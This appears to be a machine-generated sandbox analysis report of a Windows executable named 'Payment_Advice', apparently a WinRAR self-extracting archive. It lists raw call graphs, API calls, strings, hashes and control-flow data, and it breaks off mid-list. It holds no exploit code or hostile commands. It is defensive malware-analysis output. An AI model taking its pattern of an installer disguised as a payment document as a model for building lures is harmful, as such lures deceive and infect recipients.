25045->25124 25046->25011 25049 51ef0c 25049->25011 25053 528b04 25051->25053 25052 51fbbc _ValidateLocalCookies 5 API calls 25054 51f408 25052->25054 25053->25052 25054->25022 25055 528a91 25054->25055 25056 528ac0 25055->25056 25057 51fbbc _ValidateLocalCookies 5 API calls 25056->25057 25058 528ae9 25057->25058 25058->25026 25059->25027 25060->25030 25217 510863 25061->25217 25065 51df3d 25266 51ac16 25065->25266 25067 51df46 _abort 25068 51df59 GetCommandLineW 25067->25068 25069 51dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 25068->25069 25070 51df68 25068->25070 25072 504092 _swprintf 51 API calls 25069->25072 25270 51c5c4 25070->25270 25073 51e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 25072->25073 25281 51b6dd LoadBitmapW 25073->25281 25076 51dfe0 25275 51dbde 25076->25275 25077 51df76 OpenFileMappingW 25079 51dfd6 CloseHandle 25077->25079 25080 51df8f MapViewOfFile 25077->25080 25079->25069 25083 51dfa0 __InternalCxxFrameHandler 25080->25083 25084 51dfcd UnmapViewOfFile 25080->25084 25088 51dbde 2 API calls 25083->25088 25084->25079 25090 51dfbc 25088->25090 25089 5190b7 8 API calls 25091 51e0aa DialogBoxParamW 25089->25091 25090->25084 25092 51e0e4 25091->25092 25093 51e0f6 Sleep 25092->25093 25094 51e0fd 25092->25094 25093->25094 25097 51e10b 25094->25097 25308 51ae2f 25094->25308 25096 51e12a DeleteObject 25098 51e146 25096->25098 25099 51e13f DeleteObject 25096->25099 25097->25096 25100 51e177 25098->25100 25101 51e189 25098->25101 25099->25098 25102 51dc3b 6 API calls 25100->25102 25316 51ac7c 25101->25316 25103 51e17d CloseHandle 25102->25103 25103->25101 25105 51e1c3 25110 51f993 GetModuleHandleW 25105->25110 25452 527cd5 25106->25452 25109->25024 25110->25034 25111->25036 25112->25039 25113->25014 25115->25043 25128 523b07 25116->25128 25119 522a67 25119->25045 25121 522a6f 25122 522a7a 25121->25122 25142 523b43 DeleteCriticalSection 25121->25142 25122->25045 25171 52c05a 25124->25171 25127 522a7d 7 API calls 2 library calls 25127->25046 25130 523b10 25128->25130 25131 523b39 25130->25131 25132 522a63 25130->25132 25143 523d46 25130->25143 25148 523b43 DeleteCriticalSection 25131->25148 25132->25119 25134 522b8c 25132->25134 25164 523c57 25134->25164 25137 522ba1 25137->25121 25139 522baf 25140 522bbc 25139->25140 25170 522bbf 6 API calls ___vcrt_FlsFree 25139->25170 25140->25121 25142->25119 25149 523c0d 25143->25149 25146 523d7e InitializeCriticalSectionAndSpinCount 25147 523d69 25146->25147 25147->25130 25148->25132 25150 523c26 25149->25150 25154 523c4f 25149->25154 25150->25154 25156 523b72 25150->25156 25153 523c3b GetProcAddress 25153->25154 25155 523c49 25153->25155 25154->25146 25154->25147 25155->25154 25162 523b7e ___vcrt_FlsGetValue 25156->25162 25157 523bf3 25157->25153 25157->25154 25158 523b95 LoadLibraryExW 25159 523bb3 GetLastError 25158->25159 25160 523bfa 25158->25160 25159->25162 25160->25157 25161 523c02 FreeLibrary 25160->25161 25161->25157 25162->25157 25162->25158 25163 523bd5 LoadLibraryExW 25162->25163 25163->25160 25163->25162 25165 523c0d ___vcrt_FlsGetValue 5 API calls 25164->25165 25166 523c71 25165->25166 25167 523c8a TlsAlloc 25166->25167 25168 522b96 25166->25168 25168->25137 25169 523d08 6 API calls ___vcrt_FlsGetValue 25168->25169 25169->25139 25170->25137 25172 52c077 25171->25172 25175 52c073 25171->25175 25172->25175 25177 52a6a0 25172->25177 25173 51fbbc _ValidateLocalCookies 5 API calls 25174 51eefe 25173->25174 25174->25049 25174->25127 25175->25173 25178 52a6ac __FrameHandler3::FrameUnwindToState 25177->25178 25189 52ac31 EnterCriticalSection 25178->25189 25180 52a6b3 25190 52c528 25180->25190 25182 52a6c2 25188 52a6d1 25182->25188 25203 52a529 29 API calls 25182->25203 25185 52a6cc 25204 52a5df GetStdHandle GetFileType 25185->25204 25186 52a6e2 _abort 25186->25172 25205 52a6ed LeaveCriticalSection _abort 25188->25205 25189->25180 25191 52c534 __FrameHandler3::FrameUnwindToState 25190->25191 25192 52c541 25191->25192 25193 52c558 25191->25193 25214 5291a8 20 API calls __dosmaperr 25192->25214 25206 52ac31 EnterCriticalSection 25193->25206 25196 52c546 25215 529087 26 API calls _abort 25196->25215 25198 52c550 _abort 25198->25182 25199 52c590 25216 52c5b7 LeaveCriticalSection _abort 25199->25216 25200 52c564 25200->25199 25207 52c479 25200->25207 25203->25185 25204->25188 25205->25186 25206->25200 25208 52b136 __dosmaperr 20 API calls 25207->25208 25210 52c48b 25208->25210 25209 52c498 25211 528dcc _free 20 API calls 25209->25211 25210->25209 25212 52af0a 11 API calls 25210->25212 25213 52c4ea 25211->25213 25212->25210 25213->25200 25214->25196 25215->25198 25216->25198 25218 51ec50 25217->25218 25219 51086d GetModuleHandleW 25218->25219 25220 5108e7 25219->25220 25221 510888 GetProcAddress 25219->25221 25224 510c14 GetModuleFileNameW 25220->25224 25328 5275fb 42 API calls __vsnwprintf_l 25220->25328 25222 5108a1 25221->25222 25223 5108b9 GetProcAddress 25221->25223 25222->25223 25225 5108cb 25223->25225 25233 510c32 25224->25233 25225->25220 25227 510b54 25227->25224 25228 510b5f GetModuleFileNameW CreateFileW 25227->25228 25229 510c08 CloseHandle 25228->25229 25230 510b8f SetFilePointer 25228->25230 25229->25224 25230->25229 25231 510b9d ReadFile 25230->25231 25231->25229 25235 510bbb 25231->25235 25236 510c94 GetFileAttributesW 25233->25236 25238 510c5d CompareStringW 25233->25238 25239 510cac 25233->25239 25319 50b146 25233->25319 25322 51081b 25233->25322 25235->25229 25237 51081b 2 API calls 25235->25237 25236->25233 25236->25239 25237->25235 25238->25233 25240 510cb7 25239->25240 25243 510cec 25239->25243 25242 510cd0 GetFileAttributesW 25240->25242 25244 510ce8 25240->25244 25241 510dfb 25265 51a64d GetCurrentDirectoryW 25241->25265 25242->25240 25242->25244 25243->25241 25245 50b146 GetVersionExW 25243->25245 25244->25243 25246 510d06 25245->25246 25247 510d73 25246->25247 25248 510d0d 25246->25248 25249 504092 _swprintf 51 API calls 25247->25249 25250 51081b 2 API calls 25248->25250 25251 510d9b AllocConsole 25249->25251 25252 510d17 25250->25252 25253 510df3 ExitProcess 25251->25253 25254 510da8 GetCurrentProcessId AttachConsole 25251->25254 25255 51081b 2 API calls 25252->25255 25329 523e13 25254->25329 25257 510d21 25255->25257 25258 50e617 53 API calls 25257->25258 25260 510d3c 25258->25260 25259 510dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25259->25253 25261 504092 _swprintf 51 API calls 25260->25261 25262 510d4f 25261->25262 25263 50e617 53 API calls 25262->25263 25264 510d5e 25263->25264 25264->25253 25265->25065 25267 51081b 2 API calls 25266->25267 25268 51ac2a OleInitialize 25267->25268 25269 51ac4d GdiplusStartup SHGetMalloc 25268->25269 25269->25067 25271 51c5ce 25270->25271 25272 51c6e4 25271->25272 25273 511fac CharUpperW 25271->25273 25331 50f3fa 82 API calls 2 library calls 25271->25331 25272->25076 25272->25077 25273->25271 25276 51ec50 25275->25276 25277 51dbeb SetEnvironmentVariableW 25276->25277 25278 51dc0e 25277->25278 25279 51dc36 25278->25279 25280 51dc2a SetEnvironmentVariableW 25278->25280 25279->25069 25280->25279 25282 51b70b GetObjectW 25281->25282 25283 51b6fe 25281->25283 25285 51b71a 25282->25285 25332 51a6c2 FindResourceW 25283->25332 25287 51a5c6 4 API calls 25285->25287 25288 51b72d 25287->25288 25289 51b770 25288->25289 25290 51b74c 25288->25290 25291 51a6c2 12 API calls 25288->25291 25300 50da42 25289->25300 25346 51a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25290->25346 25294 51b73d 25291->25294 25293 51b754 25347 51a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25293->25347 25294->25290 25296 51b743 DeleteObject 25294->25296 25296->25290 25297 51b75d 25348 51a80c 8 API calls 25297->25348 25299 51b764 DeleteObject 25299->25289 25357 50da67 25300->25357 25305 5190b7 25306 51eb38 8 API calls 25305->25306 25307 5190d6 25306->25307 25307->25089 25310 51ae3c 25308->25310 25309 51aeca 25309->25097 25310->25309 25448 511fdd 25310->25448 25312 51ae64 25312->25309 25451 51ac04 SetCurrentDirectoryW 25312->25451 25314 51ae72 _abort _wcslen 25315 51aea6 SHFileOperationW 25314->25315 25315->25309 25317 51acab GdiplusShutdown OleUninitialize 25316->25317 25317->25105 25320 50b15a GetVersionExW 25319->25320 25321 50b196 25319->25321 25320->25321 25321->25233 25323 51ec50 25322->25323 25324 510828 GetSystemDirectoryW 25323->25324 25325 510840 25324->25325 25326 51085e 25324->25326 25327 510851 LoadLibraryW 25325->25327 25326->25233 25327->25326 25328->25227 25330 523e1b 25329->25330 25330->25259 25330->25330 25331->25271 25333 51a6e5 SizeofResource 25332->25333 25334 51a7d3 25332->25334 25333->25334 25335 51a6fc LoadResource 25333->25335 25334->25282 25334->25285 25335->25334 25336 51a711 LockResource 25335->25336 25336->25334 25337 51a722 GlobalAlloc 25336->25337 25337->25334 25338 51a73d GlobalLock 25337->25338 25339 51a7cc GlobalFree 25338->25339 25340 51a74c __InternalCxxFrameHandler 25338->25340 25339->25334 25341 51a7c5 GlobalUnlock 25340->25341 25349 51a626 GdipAlloc 25340->25349 25341->25339 25344 51a7b0 25344->25341 25345 51a79a GdipCreateHBITMAPFromBitmap 25345->25344 25346->25293 25347->25297 25348->25299 25350 51a645 25349->25350 25351 51a638 25349->25351 25350->25341 25350->25344 25350->25345 25353 51a3b9 25351->25353 25354 51a3e1 GdipCreateBitmapFromStream 25353->25354 25355 51a3da GdipCreateBitmapFromStreamICM 25353->25355 25356 51a3e6 25354->25356 25355->25356 25356->25350 25358 50da75 _wcschr __EH_prolog 25357->25358 25359 50daa4 GetModuleFileNameW 25358->25359 25360 50dad5 25358->25360 25361 50dabe 25359->25361 25403 5098e0 25360->25403 25361->25360 25363 50959a 80 API calls 25365 50da4e 25363->25365 25364 50db31 25414 526310 25364->25414 25401 50e29e GetModuleHandleW FindResourceW 25365->25401 25367 50e261 78 API calls 25368 50db05 25367->25368 25368->25364 25368->25367 25382 50dd4a 25368->25382 25369 50db44 25370 526310 26 API calls 25369->25370 25378 50db56 ___vcrt_FlsGetValue 25370->25378 25371 50dc85 25371->25382 25434 509d70 81 API calls 25371->25434 25373 509e80 79 API calls 25373->25378 25375 50dc9f ___std_exception_copy 25376 509bd0 82 API calls 25375->25376 25375->25382 25379 50dcc8 ___std_exception_copy 25376->25379 25378->25371 25378->25373 25378->25382 25428 509bd0 25378->25428 25433 509d70 81 API calls 25378->25433 25381 50dcd3 _wcslen ___std_exception_copy ___vcrt_FlsGetValue 25379->25381 25379->25382 25435 511b84 MultiByteToWideChar 25379->25435 25381->25382 25383 50e159 25381->25383 25398 511da7 WideCharToMultiByte 25381->25398 25436 50e5b1 50 API calls __vsnprintf 25381->25436 25437 526159 26 API calls 3 library calls 25381->25437 25438 528cce 26 API calls 2 library calls 25381->25438 25439 527625 26 API calls 2 library calls 25381->25439 25440 50e27c 78 API calls 25381->25440 25382->25363 25393 50e1de 25383->25393 25441 528cce 26 API calls 2 library calls 25383->25441 25385 50e16e 25442 527625 26 API calls 2 library calls 25385->25442 25387 50e214 25391 526310 26 API calls 25387->25391 25389 50e1c6 25443 50e27c 78 API calls 25389->25443 25390 50e261 78 API calls 25390->25393 25394 50e22d 25391->25394 25393->25387 25393->25390 25395 526310 26 API calls 25394->25395 25395->25382 25398->25381 25402 50da55 25401->25402 25402->25305 25404 5098ea 25403->25404 25405 50994b CreateFileW 25404->25405 25406 50996c GetLastError 25405->25406 25410 5099bb 25405->25410 25407 50bb03 GetCurrentDirectoryW 25406->25407 25408 50998c 25407->25408 25409 509990 CreateFileW GetLastError 25408->25409 25408->25410 25409->25410 25412 5099b5 25409->25412 25411 5099ff 25410->25411 25413 5099e5 SetFileTime 25410->25413 25411->25368 25412->25410 25413->25411 25415 526349 25414->25415 25416 52634d 25415->25416 25427 526375 25415->25427 25444 5291a8 20 API calls __dosmaperr 25416->25444 25418 526352 25445 529087 26 API calls _abort 25418->25445 25419 526699 25421 51fbbc _ValidateLocalCookies 5 API calls 25419->25421 25423 5266a6 25421->25423 25422 52635d 25424 51fbbc _ValidateLocalCookies 5 API calls 25422->25424 25423->25369 25426 526369 25424->25426 25426->25369 25427->25419 25446 526230 5 API calls _ValidateLocalCookies 25427->25446 25429 509bdc 25428->25429 25431 509be3 25428->25431 25429->25378 25431->25429 25432 509785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25431->25432 25447 506d1a 77 API calls 25431->25447 25432->25431 25433->25378 25434->25375 25435->25381 25436->25381 25437->25381 25438->25381 25439->25381 25440->25381 25441->25385 25442->25389 25443->25393 25444->25418 25445->25422 25446->25427 25447->25431 25449 511fea _wcslen 25448->25449 25450 51201d CompareStringW 25449->25450 25450->25312 25451->25314 25453 527ce1 _abort 25452->25453 25454 527cfa 25453->25454 25455 527ce8 25453->25455 25476 52ac31 EnterCriticalSection 25454->25476 25488 527e2f GetModuleHandleW 25455->25488 25458 527ced 25458->25454 25489 527e73 GetModuleHandleExW 25458->25489 25459 527d9f 25477 527ddf 25459->25477 25462 527d01 25462->25459 25464 527d76 25462->25464 25497 5287e0 20 API calls _abort 25462->25497 25468 527d8e 25464->25468 25473 528a91 _abort 5 API calls 25464->25473 25466 527de8 25498 532390 5 API calls _ValidateLocalCookies 25466->25498 25467 527dbc 25480 527dee 25467->25480 25469 528a91 _abort 5 API calls 25468->25469 25469->25459 25473->25468 25476->25462 25499 52ac81 LeaveCriticalSection 25477->25499 25479 527db8 25479->25466 25479->25467 25500 52b076 25480->25500 25483 527e1c 25486 527e73 _abort 8 API calls 25483->25486 25484 527dfc GetPEB 25484->25483 25485 527e0c GetCurrentProcess TerminateProcess 25484->25485 25485->25483 25487 527e24 ExitProcess 25486->25487 25488->25458 25490 527ec0 25489->25490 25491 527e9d GetProcAddress 25489->25491 25492 527ec6 FreeLibrary 25490->25492 25493 527ecf 25490->25493 25495 527eb2 25491->25495 25492->25493 25494 51fbbc _ValidateLocalCookies 5 API calls 25493->25494 25496 527cf9 25494->25496 25495->25490 25496->25454 25497->25464 25499->25479 25501 52b09b 25500->25501 25505 52b091 25500->25505 25502 52ac98 __dosmaperr 5 API calls 25501->25502 25502->25505 25503 51fbbc _ValidateLocalCookies 5 API calls 25504 527df8 25503->25504 25504->25483 25504->25484 25505->25503 25605 52b1b8 27 API calls 3 library calls 25606 511bbd GetCPInfo IsDBCSLeadByte 25559 51dca1 DialogBoxParamW 25607 51f3a0 27 API calls 25562 52a4a0 71 API calls _free 25563 5308a0 IsProcessorFeaturePresent 25608 51eda7 48 API calls _unexpected 25610 506faa 111 API calls 3 library calls

                                                                                                    Executed Functions

                                                                                                    Function 0051DF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195filesleeptimeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00510863: GetModuleHandleW.KERNEL32(kernel32), ref: 0051087C
                                                                                                      • Part of subcall function 00510863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0051088E
                                                                                                      • Part of subcall function 00510863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 005108BF
                                                                                                      • Part of subcall function 0051A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0051A655
                                                                                                      • Part of subcall function 0051AC16: OleInitialize.OLE32(00000000), ref: 0051AC2F
                                                                                                      • Part of subcall function 0051AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0051AC66
                                                                                                      • Part of subcall function 0051AC16: SHGetMalloc.SHELL32(00548438), ref: 0051AC70
                                                                                                    • GetCommandLineW.KERNEL32 ref: 0051DF5C
                                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0051DF83
                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0051DF94
                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0051DFCE
                                                                                                      • Part of subcall function 0051DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0051DBF4
                                                                                                      • Part of subcall function 0051DBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0051DC30
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0051DFD7
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,0055EC90,00000800), ref: 0051DFF2
                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxname,0055EC90), ref: 0051DFFE
                                                                                                    • GetLocalTime.KERNEL32(?), ref: 0051E009
                                                                                                    • _swprintf.LIBCMT ref: 0051E048
                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0051E05A
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0051E061
                                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 0051E078
                                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0051E0C9
                                                                                                    • Sleep.KERNELBASE(?), ref: 0051E0F7
                                                                                                    • DeleteObject.GDI32 ref: 0051E130
                                                                                                    • DeleteObject.GDI32(?), ref: 0051E140
                                                                                                    • CloseHandle.KERNEL32 ref: 0051E183
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzU
                                                                                                    • API String ID: 3049964643-1481520227
                                                                                                    • Opcode ID: 0d3f46231f59000367be4a86103ac296756399d1fe774485a827c6086c791dbd
                                                                                                    • Instruction ID: 2ed8eea9a222feffbad7aea7950c3c5d64d65836c80d0a624b5b068194bdaa2e
                                                                                                    • Opcode Fuzzy Hash: 0d3f46231f59000367be4a86103ac296756399d1fe774485a827c6086c791dbd
                                                                                                    • Instruction Fuzzy Hash: C6610975504305BFE320AB64EC5EEAB3FECBBA5705F000429F94592291EB749D8CD761
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051A6C2 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100memorywindowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 656 51a6c2-51a6df FindResourceW 657 51a6e5-51a6f6 SizeofResource 656->657 658 51a7db 656->658 657->658 660 51a6fc-51a70b LoadResource 657->660 659 51a7dd-51a7e1 658->659 660->658 661 51a711-51a71c LockResource 660->661 661->658 662 51a722-51a737 GlobalAlloc 661->662 663 51a7d3-51a7d9 662->663 664 51a73d-51a746 GlobalLock 662->664 663->659 665 51a7cc-51a7cd GlobalFree 664->665 666 51a74c-51a76a call 520320 664->666 665->663 670 51a7c5-51a7c6 GlobalUnlock 666->670 671 51a76c-51a78e call 51a626 666->671 670->665 671->670 676 51a790-51a798 671->676 677 51a7b3-51a7c1 676->677 678 51a79a-51a7ae GdipCreateHBITMAPFromBitmap 676->678 677->670 678->677 679 51a7b0 678->679 679->677
                                                                                                    APIs
                                                                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0051B73D,00000066), ref: 0051A6D5
                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,0051B73D,00000066), ref: 0051A6EC
                                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,0051B73D,00000066), ref: 0051A703
                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,0051B73D,00000066), ref: 0051A712
                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0051B73D,00000066), ref: 0051A72D
                                                                                                    • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0051B73D,00000066), ref: 0051A73E
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0051A7C6
                                                                                                      • Part of subcall function 0051A626: GdipAlloc.GDIPLUS(00000010), ref: 0051A62C
                                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0051A7A7
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0051A7CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                                    • String ID: FvnQ$PNG
                                                                                                    • API String ID: 541704414-2645278782
                                                                                                    • Opcode ID: c55fb92867185f7450c0b85ed215be295b34a5ec911870bfa6e43d2961273e12
                                                                                                    • Instruction ID: ed2a42bc0f2e1dc95c84d98f232f29d1b0e83a05cab117e75e7ad1994ae0e81f
                                                                                                    • Opcode Fuzzy Hash: c55fb92867185f7450c0b85ed215be295b34a5ec911870bfa6e43d2961273e12
                                                                                                    • Instruction Fuzzy Hash: 4F319379601702AFE7119F21EC88D6B7FB9FF95761B040919F805C22A1EB31DD88EB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1061 50a69b-50a6bf call 51ec50 1064 50a6c1-50a6ce FindFirstFileW 1061->1064 1065 50a727-50a730 FindNextFileW 1061->1065 1066 50a6d0-50a6e2 call 50bb03 1064->1066 1067 50a742-50a7ff call 510602 call 50c310 call 5115da * 3 1064->1067 1065->1067 1068 50a732-50a740 GetLastError 1065->1068 1076 50a6e4-50a6fc FindFirstFileW 1066->1076 1077 50a6fe-50a707 GetLastError 1066->1077 1074 50a804-50a811 1067->1074 1069 50a719-50a722 1068->1069 1069->1074 1076->1067 1076->1077 1079 50a717 1077->1079 1080 50a709-50a70c 1077->1080 1079->1069 1080->1079 1082 50a70e-50a711 1080->1082 1082->1079 1084 50a713-50a715 1082->1084 1084->1069
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0050A592,000000FF,?,?), ref: 0050A6C4
                                                                                                      • Part of subcall function 0050BB03: _wcslen.LIBCMT ref: 0050BB27
                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0050A592,000000FF,?,?), ref: 0050A6F2
                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0050A592,000000FF,?,?), ref: 0050A6FE
                                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0050A592,000000FF,?,?), ref: 0050A728
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0050A592,000000FF,?,?), ref: 0050A734
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 42610566-0
                                                                                                    • Opcode ID: db087829411246b868f689709e89edc57114701962d1c1211f6b0dd1d705e3e6
                                                                                                    • Instruction ID: 2c6c818fa8da439dacfb9a5a7500b2a66375f2bea7502245319d67ad7f79ca51
                                                                                                    • Opcode Fuzzy Hash: db087829411246b868f689709e89edc57114701962d1c1211f6b0dd1d705e3e6
                                                                                                    • Instruction Fuzzy Hash: 16417176900615ABCB25DF68CC88AEDBBB8FB48350F144196F95AD3240D7346E94CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00527DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00527DC4,?,0053C300,0000000C,00527F1B,?,00000002,00000000), ref: 00527E0F
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00527DC4,?,0053C300,0000000C,00527F1B,?,00000002,00000000), ref: 00527E16
                                                                                                    • ExitProcess.KERNEL32 ref: 00527E28
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: 53b270b7809befb67c00d50076c544e51eceebcbe30ad193a9c3db732b2285cf
                                                                                                    • Instruction ID: d6e05ecd2fa5a74975f1aafa78612d6d0ef2af3b74b21a026df49a9750a12314
                                                                                                    • Opcode Fuzzy Hash: 53b270b7809befb67c00d50076c544e51eceebcbe30ad193a9c3db732b2285cf
                                                                                                    • Instruction Fuzzy Hash: B6E04631000158ABCF02AF60ED0DA4A3F6AFF65341F014494F8098B272CB36DE96EAA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
